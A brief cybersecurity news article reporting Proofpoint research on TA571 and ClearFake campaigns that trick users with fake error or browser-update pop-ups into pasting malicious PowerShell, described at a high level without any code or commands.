Cybercriminals use new social engineering tactic for running PowerShell and installing malware

Cybercriminals use new social engineering tactic for running PowerShell and installing malware

A threat actor known as TA571 and the ClearFake activity cluster have been observed employing an innovative social engineering technique designed to manipulate users into executing malicious PowerShell scripts and infecting victim devices with malware.

The technique, detailed by Proofpoint researchers, involves directing users to copy and paste malicious PowerShell scripts that lead to the deployment of various malicious tools, including DarkGate, Matanbuchus, NetSupport, and several information stealers.

Regardless of whether the initial campaign starts via malicious spam (malspam) or web browser injects, the technique follows a similar pattern. Users are presented with a pop-up message displaying an error while trying to open a document or webpage. Instructions are then provided to copy and paste a script into either the PowerShell terminal or the Windows Run dialog box, triggering the execution of the malicious script.

Proofpoint first observed TA571 employing this technique in March 2024, and the ClearFake cluster began using it in early April. ClearFake campaigns involve compromising legitimate websites with malicious HTML and JavaScript, presenting users with fake browser update prompts.

When users visit a compromised site, an injection loads a malicious script hosted on the blockchain via Binance’s Smart Chain contracts—a method known as “EtherHiding.” This script loads a second script from a domain using Keitaro TDS for filtering. If the victim continues to browse the site, they see a fake warning overlay instructing them to install a “root certificate.” Following the instructions leads to executing a PowerShell script.

Back to the list

Latest Posts

Researchers caught embedding hidden AI prompts to sway research reviewers

Researchers caught embedding hidden AI prompts to sway research reviewers

The investigation analyzed English-language preprints published on the research platform arXiv and found concealed AI instructions in 17 papers.
7 July 2025
Brazilian programmer arrested for role in $185 million bank hack

Brazilian programmer arrested for role in $185 million bank hack

João Nazareno Roque, a junior back-end developer at C&M, was allegedly recruited by hackers in a bar in São Paulo.
7 July 2025
APT36 cyber-espionage campaign targeting Indian defense sector via BOSS Linux

APT36 cyber-espionage campaign targeting Indian defense sector via BOSS Linux

More recently, APT36 has shifted its focus to Linux-based environments.
7 July 2025